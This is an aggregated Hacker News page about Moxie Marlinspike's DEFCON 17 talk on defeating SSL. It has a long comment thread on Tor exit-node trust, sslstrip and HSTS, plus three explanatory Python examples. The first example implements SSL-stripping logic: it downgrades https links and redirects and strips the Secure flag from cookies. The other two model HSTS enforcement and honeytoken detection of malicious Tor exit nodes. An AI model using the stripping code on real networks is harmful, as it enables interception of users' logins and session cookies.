
Hacker News Comments on
DEFCON 17: More Tricks For Defeating SSL

Christiaan008 · Youtube · 2 HN points · 3 HN comments
HN Theater has aggregated all Hacker News stories and comments that mention Christiaan008's video "DEFCON 17: More Tricks For Defeating SSL".
Youtube Summary
Speaker: Moxie Marlinspike

This talk aims to pick up where SSL stripping left off. While sslstrip ultimately remains quite deadly in practice, this talk will demonstrate some new tricks for defeating SSL/TLS in places where sslstrip does not reach. Cautious users, for example, have been advised to explicitly visit https URLs or to use bookmarks in order to protect themselves from sslstrip, while other SSL/TLS based protocols such as imaps, pop3s, smtps, ssl/irc, and SSL-based VPNs never present an opportunity for stripping. This talk will outline some new tools and tricks aimed at these points of communication, ultimately providing highly effective attacks on SSL/TLS connections themselves.
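The stripping attack the talk builds on works on the plaintext side of the connection: the attacker never touches TLS, it just makes sure the victim never starts a TLS session. The following Python is an added example written for this page, not sslstrip's own code; the host names, HTML body and cookie header are constructed for the illustration. It models the three steps that matter: rewrite every https:// reference the server sends into http://, remember which URLs were downgraded so the attacker can fetch them over TLS itself, and drop the Secure attribute from cookies so the browser will send the session back over the plaintext leg.

```python
"""
Added example (not sslstrip's own code): the link-rewriting step that lets
an active attacker on the plaintext side keep a victim on HTTP while the
attacker talks TLS to the real site. Host names and the HTML body are
constructed for the illustration.
"""
import re
from urllib.parse import urlsplit

# Any absolute https:// reference in HTML, headers or JavaScript strings.
HTTPS_REF = re.compile(r'https://([^\s"\'<>]+)', re.IGNORECASE)


class StripState:
    """Per-victim record of which URLs were downgraded, so that a later
    plain-HTTP request from the victim is forwarded upstream over TLS."""

    def __init__(self):
        self.downgraded = set()   # (host, path) pairs the victim only ever saw as http://

    def rewrite_response(self, body: str) -> str:
        """Replace every https:// reference with http:// and remember it."""
        def downgrade(match):
            plain = 'http://' + match.group(1)
            parts = urlsplit(plain)
            self.downgraded.add((parts.netloc.lower(), parts.path or '/'))
            return plain
        return HTTPS_REF.sub(downgrade, body)

    def rewrite_location(self, location: str) -> str:
        """A 3xx redirect to https:// is what normally moves the user onto TLS;
        the attacker rewrites that header too, so the upgrade never reaches the victim."""
        return self.rewrite_response(location)

    def upstream_scheme(self, host: str, path: str) -> str:
        """Scheme the attacker uses toward the real server for a victim request."""
        return 'https' if (host.lower(), path or '/') in self.downgraded else 'http'


def strip_secure_flag(set_cookie: str) -> str:
    """Drop the Secure attribute so the victim's browser will send the session
    cookie back over the plaintext leg the attacker controls."""
    attrs = [a.strip() for a in set_cookie.split(';')]
    return '; '.join(a for a in attrs if a.lower() != 'secure')


if __name__ == '__main__':
    state = StripState()
    page = '<a href="https://bank.example/login">Log in</a>'
    print(state.rewrite_response(page))                      # link now points at http://
    print(state.upstream_scheme('bank.example', '/login'))   # attacker fetches it over https
```

The victim sees a working site with no certificate warning because there is no certificate: the only TLS session is between the attacker and the real server. The advice in the summary above (type the https URL yourself, or use a bookmark) works precisely because it bypasses the rewritten link or redirect that this code targets.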


For more information visit: http://bit.ly/defcon17_information

To download the video visit: http://bit.ly/defcon17_videos
Hacker News Stories and Comments

All the comments and stories posted to Hacker News that reference this video.
moxie, the founder of OWS, was already well-known before Snowden. SSLstrip, for example: https://moxie.org/software/sslstrip/ and this DEFCON talk where he presents multiple attacks on cert validation: https://youtube.com/watch?v=ibF36Yyeehw
I'm probably going to take some flack for this, but I don't trust Tor. When you access Tor, you're masking your origin IP to the remote address by trusting one of a couple hundred volunteer exit nodes who raised their hands and said "Trust me! You can route all of your internet traffic through me and I promise I won't monitor or inject anything..."

I think most Tor users don't have an adequate understanding of the threat model. It doesn't help that the Tor Project has at times upsold the anonymity provided to a ludicrous extent[1] (to be fair, they do address the risk in their FAQ[2]). Is it more likely that Comcast will MITM me, or some random exit node? I might expect Comcast to maybe inject an ad into an HTTP connection or do some DNS redirect to shoot me an advertisement, but I don't worry about them stealing my credit card or injecting a buffer overflow or something. In fact, they have a profit incentive to not do so. I don't have that guarantee with a random exit node. It might be a generous privacy advocate, or it might be someone who has more nefarious profit incentive in mind[3]. If you're only connecting through Tor just to avoid the NSA, then you have to assume that both a) the NSA is targeting you to begin with, and b) that exit node you're going through isn't controlled by the NSA (or GCHQ/FSB/PLA/etc).

sslstrip[4] undermines the prospect of protecting yourself by connecting solely over SSL through Tor. Even then, in my experience more than half of the sites I visit don't support SSL to begin with. The HTTPS Everywhere plugin that EFF provides and is included in the Tor Browser Bundle is implemented backwards - it connects over SSL only when the site matches a whitelist[5] (I use KB SSL Enforcer on Chrome myself).

Sorry if this came off as a rant - I just see too many articles like this that prop up Tor as a silver bullet without discussing the risks and establishing an adequate threat model that allows the user to make an informed decision regarding the risks/benefits of using Tor.

[1] http://betaboston.com/news/2014/05/07/as-domestic-abuse-goes...

[2] https://www.torproject.org/docs/faq.html.en#AttacksOnOnionRo...

[3] http://threatpost.com/small-number-of-malicious-tor-exit-rel...

[4] https://www.youtube.com/watch?v=ibF36Yyeehw

[5] https://www.eff.org/https-everywhere/faq

growupkids
I hope you realize you just described the entire Internet. Which is the ultimate irony of complaining about the security of tor: you're trusting someone else to forward your packets. Yes, yes they can modify the traffic to and from your host, and yes, yes they can monitor everything you're doing. The difference with the non-tor Internet is that it's far far easier to do that.
csandreasen
You're absolutely correct in that it is a trust issue. However, when Comcast forwards my packets they have both a profit incentive to not go stealing all of my credit card info (their customers would quickly take their business elsewhere) and a legal incentive (they're a known entity inside the US - someone's going to court). With Tor, I'm putting all of my trust in someone likely on the other side of the globe who has given me no more identifying information than an IP address and promises no more than that they'll offer me free bandwidth. That person could have set up shop a few hours ago and may be gone tomorrow.

And what if they did sslstrip your connection to your bank's website? Would Tor catch it if the exit node only did it for a week or two and only to .5% of the connections? Would any of the victims be able to determine the source of the attack? How many people on Tor actually keep track of what exit nodes their traffic is going through?

stephen_g
What's the point of using Tor to access your bank's website though? I don't think that is a normal use case at all because there's no point using an anonymity network for that, because your bank probably knows who you are. Exactly the same as with credit cards.

If you're going to pay for something over Tor, it should probably be with a prepaid credit card (or bitcoin). And if you're buying something anonymously then you know you're taking a risk.

Same as with email accounts or any other account. It doesn't make sense to use any account through Tor that you've used outside it, as it could already be identifying information.

jessaustin
...Comcast...their customers would quickly take their business elsewhere...

This isn't always possible for Comcast customers.

growupkids
Or many customers in the US. For most consumers you have one choice of broadband provider due to local government monopoly grants. It's either comcast, or verizon or another big telco/cable company, but rarely is there a second equivalent option.
growupkids
Again, the same can be said of non-tor traffic.

How many people keep track of the route their packets take? (Dare I say none?) How many third parties will it pass thru? (Many). How many of them can be trusted to not monitor you (this is why ssl and even ssh was invented), how many have adequate security controls to prevent data theft (again, this is also why ssl and other tools were invented), how many can be trusted to not forward your data to a hostile government, etc.

It's the same problem, trust. And since when was the internet considered a trusted network? Calling out Tor for inherent trust issues with the path is ironic, neither the internet nor tor is a trusted network. Tor's solving a different problem: monitoring. Both have the same problem which neither solves: tampering, but other technologies do (ssh, TLS, etc.)

In both cases, you shouldn't trust a third party (or an intruder into that third party's network) to either not modify your packets or to respect your privacy. At least tor helps with the latter; the former isn't solved by blindly trusting an ISP or assuming your entire route is trusted (NSA anyone?).

Trust no untrusted network. At least tor is upfront about this.

3pt14159
I think the key is that Tor should only be used with HTTPS connections. Anyone that's like "zomg, my HTTP connections are being recorded by Tor exit nodes don't use Tor!" is kinda being a bit silly. I personally know people that have designed hardware for major ISPs to specifically record HTTP traffic for non-benign purposes.

I don't trust Tor for a completely different reason: you become a threat. Just by sending Tor traffic from your home, you're flagged as a potential active monitoring target, and I don't really need the additional heat.

darsham
>you're masking your origin IP to the remote address by trusting one of a couple hundred volunteer exit nodes

No! When using Tor, you are not trusting any single node, and that's the whole point. The exit node does not know your IP or anything else about you, and the other nodes do not know what server you're communicating with. And you should never send any personal information over Tor, such as your credit card, because the end server would be able to identify you and steal that information (and why would you trust the end server? The idea is not to trust anyone when using Tor.)

AJ007
While man-in-the-middle attacks may be detectable (http://www.cs.kau.se/philwint/spoiled_onions/techreport.pdf), just recording all the unencrypted traffic would be worthwhile.

The simple answer is most people that use an electronic device -- Tor or otherwise -- have no idea what they are doing. Because Tor is advertised as extremely safe, they think they are safe. Anyone wanting an interesting stream of data just has to operate as many exit nodes as their budget can handle.

e12e
Additionally, I'd assume that most organizations that are able to run or back-door a large percentage of TOR exit nodes are also able to mint SSL certificates under keys that most browsers would accept as legitimate.
totoroisalive
This same argument applies to almost everything related to the internet and technology.

When you use TOR you should be aware of the trade offs.

The golden rule is don't trust something you don't understand, even if you do, don't trust.

gipp
Sure, but this is why pretty much every resource on Tor stresses the importance of end-to-end encryption for sensitive or identifying info.
csandreasen
That's why I mention sslstrip (check out the presentation - it's scary) and overall lack of SSL on the internet. To provide some anecdata, my browser window currently has 8 tabs open right now.

Those that support HTTPS: news.ycombinator.com; twitter.com; www.torproject.org

Those that don't: cryptome.org (!); zzaper.co.uk (the Vim tips article from a few days ago); forbes.com; vimeo.com; nytimes.com

End-to-end encryption would be great, but the internet at large just isn't there yet in terms of both HTTPS support on most sites and safeguards against SSL tampering.

glomph
What is the use to an exit node in knowing that someone is reading cryptome, zzaper, forbes, vimeo and nytimes? Presumably you are not going to transfer any identifying info to these sites.
discreditable
Tracking cookies used across various services are known to be used by the NSA to identify users.
id
That's why the Tor Browser clears cookies on close. But you are free to disable them entirely.
FedRegister
If you're using the same browser for Tor and non-Tor traffic (and therefore the same cookies) then You Are Doing It Wrong.
hackcasual
I will say safeguards against tampering are getting better for newer browsers. I'm working on a software stack for PirateBox type systems but focused on security, so I get a pretty good glimpse at how a lot of sites handle incorrect certs, since it's an internetless portal and redirects everything to its hosted SSL page. Both gmail and hackernews will refuse to load at all, as they properly support HSTS. Well gmail "cheats" and is hard coded in chrome.
frandroid
So how does Gmail do it with other browsers?
hackcasual
http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security#...
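The exchange above (HSTS refusing to load over a bad certificate, and Gmail being "hard coded" in Chrome) comes down to how the browser's HSTS store answers one question before any packet leaves the machine: must this http:// navigation become https://? The Python below is an added model of that store, written for this page and not browser code; the preload entries and headers are constructed for the illustration (real preload lists are compiled into the browser). It shows why a policy learned from a header only helps on the second visit, why a stripping attacker on plain HTTP cannot set or clear it, and how includeSubDomains and expiry are evaluated.

```python
"""
Added example (not browser code): a model of the HSTS store that decides,
before any packet leaves the machine, whether an http:// navigation must
become https://. The preload entries and headers are constructed for the
illustration; real preload lists are compiled into the browser.
"""
import time
from urllib.parse import urlsplit, urlunsplit

# Constructed stand-in for the compiled-in preload list: host -> includeSubDomains.
PRELOAD = {
    'mail.google.com': True,
    'preloaded.example': True,
}


class HstsStore:
    def __init__(self, now=time.time):
        self._now = now
        self._entries = {}   # host -> (expiry, include_subdomains)

    def observe_header(self, host, header, over_tls):
        """Apply a Strict-Transport-Security header. Returns True if it changed the store.
        RFC 6797 requires the header to be ignored unless it arrived over a TLS
        connection with no certificate errors, so a stripping attacker on plain
        HTTP can neither set nor clear the policy."""
        if not over_tls:
            return False
        max_age, include_sub = None, False
        for directive in header.split(';'):
            name, _, value = directive.strip().partition('=')
            name = name.strip().lower()
            if name == 'max-age':
                try:
                    max_age = int(value.strip().strip('"'))
                except ValueError:
                    return False
            elif name == 'includesubdomains':
                include_sub = True
        if max_age is None:
            return False
        host = host.lower()
        if max_age == 0:
            self._entries.pop(host, None)   # max-age=0 is the server's way to forget the policy
        else:
            self._entries[host] = (self._now() + max_age, include_sub)
        return True

    def is_protected(self, host):
        """Walk from the exact host up through its parents; a parent entry only
        applies when it was set (or preloaded) with includeSubDomains."""
        labels = host.lower().split('.')
        for i in range(len(labels)):
            candidate = '.'.join(labels[i:])
            exact = (i == 0)
            if candidate in PRELOAD and (exact or PRELOAD[candidate]):
                return True
            entry = self._entries.get(candidate)
            if entry is not None:
                expiry, include_sub = entry
                if expiry > self._now() and (exact or include_sub):
                    return True
        return False

    def upgrade(self, url):
        """Return the URL the browser will actually request. Explicit ports are
        left alone here (a simplification; RFC 6797 maps 80 to 443)."""
        parts = urlsplit(url)
        if parts.scheme == 'http' and self.is_protected(parts.hostname or ''):
            return urlunsplit(('https', parts.netloc, parts.path, parts.query, parts.fragment))
        return url


if __name__ == '__main__':
    store = HstsStore()
    print(store.upgrade('http://mail.google.com/'))      # preloaded: upgraded before any request
    print(store.upgrade('http://bank.example/login'))    # first visit, nothing known: stays http
```

The first-visit gap is the whole point of preloading: a site that is not in the list has no protection until the browser has once received its header over a clean TLS connection, and a stripping attacker on that first visit makes sure it never does. Once the entry exists, the redirect-rewriting trick has nothing to rewrite, because the browser never issues the http:// request at all.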
bigbugbag
a) The NSA collects first and targets later b) The NSA may control the exit node your traffic is going through vs the NSA collects all network traffic from everywhere.

Using tor does add an additional anonymity layer.

lern_too_spel
This is incorrect and dangerously misleading. The NSA collects data that crosses the US border. An internet user in America is more likely to have their data cross a border if they use TOR. In this respect, TOR makes your data more likely to be collected unless you have reason to believe you're already being monitored anyway.
chopin
But only exit nodes are the problem here. Traffic between nodes is encrypted anyway. If the encryption is sound (and there is no reason to assume the contrary), they may collect as much as they want.

There is anyway no guarantee at all, that non-TOR traffic doesn't cross borders. And you can't assume that any three letter agency acts within the (intended) legal boundaries. To be safe, only end-to-end encryption helps.

anonymousDan
My worry is that by using Tor at all you become a target for active monitoring, even if the content and destination of your Tor communication can't be decrypted.
chopin
Which is why it is important that many people use it. I don't think it is a viable strategy to MITM everyone (at least it will not go undetected), if that is what you assume being a target for active monitoring. Or to send agents to every house. If we are forcing them to do that, we have won.
lern_too_spel
Sorry if I wasn't clear, but this is exactly my point. Most of your traffic as an American will stay within the country's borders because most of the services you access are in the US. By using TOR, your traffic will now appear to come from an exit node that has a greater than zero probability of being outside the US. The average American user thus has increased the likelihood of their data being analyzed by the NSA by using TOR. Under great-grandparent's particular threat model, the user is worse off.

Also, we can assume that the NSA operates within those bounds because that's what Snowden's leaked documents say in describing their systems. We have their internal documentation as proof.

belorn
Lets address your concern by talking about security and probability for each of those issues.

Credit card thieves in Comcast vs in TOR. Given the number of employees who have remote access to customers' routers (ie support), sysadmins that have remote server access, and personnel who have physical access to switching equipment, what's the risk that one of those people has a criminal record? This will always be non-zero, and one can never actually test it.

In TOR, this risk can be tested[1]. Exit nodes can be probed by sending unique credit card numbers or other profitable personal information, and then observed by seeing what the node owner does. If they act on the information, the node then gets blocked. You can not do this with Comcast since your identity is known to the personnel of Comcast.

The NSA threat, as talked about, is reduced by using TOR. Doing statistical analysis is in theory possible but in practice very hard. Out of all the Snowden leaks, not a single one presents this as an ongoing work happening. Non-tor traffic analysis is however presented as business-as-usual and should be assumed to happen at every point in the network.

Last, the HTTPS Everywhere you mention is a direct answer to the SSLstrip for the most commonly used websites. Claiming it is implemented backwards because it uses a blacklist is a bit unfair, since blacklist and whitelist each have their own tradeoffs in security. HTTPS Everywhere has no false positives and protects against the common threat, but will be vulnerable against uncommon ones. If they had gone with a HTTPS-only approach, it would have caused an extreme amount of false-positives, and users would have turned it off. This trade-off (security vs false positives) is commonly the distinction between user products and server products.

KB SSL Enforcer does not protect against sslstrip and MITM[2] for new installations. If the Tor Browser Bundle included KB SSL Enforcer, it would worsen the security of the Bundle compared to HTTPS Everywhere, and would be counter to the design. Rather than leaving no records of the sites you go to, KB SSL Enforcer has to record and permanently store it.

[1] http://www.slideshare.net/FreeLeaks/exposing-malicious-tor-e...

[2] https://code.google.com/p/kbsslenforcer/wiki/FAQ

walls
The Snowden leaks most definitely present this as ongoing work: http://www.theguardian.com/world/interactive/2013/oct/04/tor...
hackerboos
Are malicious exit nodes actively blocked by the project?
belorn
Yes. The list of tor nodes is handled by a small number of directory authorities. They vote on a list, which each client then tallies in order to create a list called the consensus. Since the number of directory authorities is small, bad nodes get blocked quite fast.

If you want to see nodes that are blocked, http://torstatus.blutmagie.de/ looks to be a good site. There have also been several research projects which have explored different avenues for finding bad nodes, and the TOR Project created a few years ago a python project which incorporated most of those methods to automatically scan for malicious nodes (https://svn.torproject.org/svn/torflow/trunk/README).

csandreasen
You can test Comcast in the same way that you can test a Tor exit node - the technique is exactly the same. The threat of a rogue network admin is similar to that of a rogue waitress stealing credit card info - significant criminal liability if caught. To top that, people in a position to carry out such an attack are generally easily identifiable by their employers if there is a criminal investigation. The same can't be said for the administrator of a Tor node in a foreign country.

The NSA threat relies on the assumption that they are targeting you specifically; the risk with a rogue exit node is that you are exposing yourself to an adversary that doesn't care who their victim is - i.e. most criminals. My issue with Tor advocacy is that it's attempting to mitigate the risk of a perceived adversary by exposing users to a much more realistic threat. My spouse and I have both had our credit cards stolen before, but I've never had any reason to believe that I've been targeted by the NSA.

There is a definite tradeoff with regards to the whitelist/blacklist model, but ultimately both solutions are really just patching over inherent flaws in the SSL trust model. I wasn't clear in my earlier post - my issue is not necessarily with the HTTPS Everywhere model, but rather the perception that it gives the user pervasive end-to-end encryption and solves the issue of rogue exit nodes.

belorn
If you test comcast in the same fashion, the rogue employee can see that you are sending several thousand unique credit-card numbers to some website and are thus behaving in a very strange and obvious manner. They can see plainly if the request comes from the investigating branch of the police.

With a tor exit-node, the operator can't identify who is sending them the traffic. They can't distinguish an investigating police officer from a victim.

You can disagree and think that rogue Comcast employees are more easily identified than Tor operators. This is a trust question, and everyone is free to pick who they trust and who they don't. The argument given in favor of Comcast just doesn't sway me, and it would likely require a research paper with test data in order to actually prove what has higher risk associated with it.

The NSA does not target people specifically. That was proven by the revelations from Snowden, and has been quite obvious for quite a long time. NSA doesn't care who their victim is when they are collecting the information. It is cheaper and more effective to target everyone, and then data mine the result after everything is in their hands.
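The probing technique debated in the last few comments (hand each exit node its own unique credit card number and watch who tries to use it) is a honeytoken scheme, and the property the commenters are arguing about is attribution: a leaked number must point back to exactly one node. The Python below is an added example written for this page, not the code of the linked research; the exit node fingerprints, the secret and the issuer prefix are constructed for the illustration, and nothing here talks to the Tor network. Tokens are derived from a secret with HMAC so they are unguessable and reproducible across runs, and made Luhn-valid so a thief's checkout form accepts them and the fraud attempt actually surfaces.

```python
"""
Added example (not the linked research's code): per-exit-node honeytokens.
Each exit node fingerprint is given its own Luhn-valid but unissued card
number derived from a secret, so any later use of that number points back
to the node that carried it. Fingerprints and the secret are constructed
for the illustration; nothing here talks to the Tor network.
"""
import hashlib
import hmac


def luhn_check_digit(partial: str) -> str:
    """Check digit that makes partial + digit pass the Luhn test."""
    total = 0
    for i, ch in enumerate(reversed(partial)):
        d = int(ch)
        if i % 2 == 0:          # these will sit in the doubled positions once the check digit is appended
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(number: str) -> bool:
    """Standard Luhn test over the digits of a (possibly formatted) number."""
    digits = [int(c) for c in number if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


class Honeytokens:
    def __init__(self, secret: bytes, bin_prefix: str = '400000'):
        self.secret = secret          # keeps tokens unguessable yet reproducible
        self.bin_prefix = bin_prefix  # constructed issuer prefix; use a range you control
        self.issued = {}              # card number -> exit node fingerprint

    def card_for_node(self, fingerprint: str) -> str:
        """Derive a 16-digit token for one exit node. Deterministic, so the
        same node gets the same number across probing runs."""
        mac = hmac.new(self.secret, fingerprint.encode(), hashlib.sha256).digest()
        # mod-10 bias in the digits is irrelevant for a honeytoken
        account = ''.join(str(b % 10) for b in mac[:9])
        partial = self.bin_prefix + account
        number = partial + luhn_check_digit(partial)
        self.issued[number] = fingerprint
        return number

    def attribute(self, observed: str):
        """Map a number seen in a fraud attempt back to the exit node that saw it,
        ignoring whatever spacing or dashes the thief's form added."""
        digits = ''.join(c for c in observed if c.isdigit())
        return self.issued.get(digits)


if __name__ == '__main__':
    tokens = Honeytokens(b'constructed-secret')
    token = tokens.card_for_node('A' * 40)   # constructed 40-hex-char relay fingerprint
    print(token, luhn_valid(token))
    print(tokens.attribute(token))           # the fingerprint that was shown this number
```

This is also why the symmetry argument in the thread does not quite hold for the Tor side: because the node operator cannot see who is sending the probe traffic, the tester looks like any other user, and a node that acts on a token can be tied to it with no ambiguity about which node leaked it.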

Jul 13, 2011 · 2 points, 0 comments · submitted by chucknthem
HN Theater is an independent project and is not operated by Y Combinator or any of the video hosting platforms linked to on this site.